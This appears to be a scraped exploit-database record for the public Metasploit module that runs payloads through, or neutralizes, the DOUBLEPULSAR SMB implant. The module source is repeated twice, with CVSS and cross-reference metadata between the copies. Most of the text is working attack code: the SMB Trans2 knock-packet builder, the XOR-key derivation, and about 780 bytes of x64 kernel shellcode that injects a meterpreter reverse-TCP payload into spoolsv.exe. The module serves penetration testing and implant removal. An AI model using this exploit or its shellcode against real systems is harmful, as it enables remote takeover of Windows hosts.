'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:26:47", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f9b5a123d6111ab2141c57d3654c482d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-15T22:18:06", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:18:06", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-15T22:18:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n 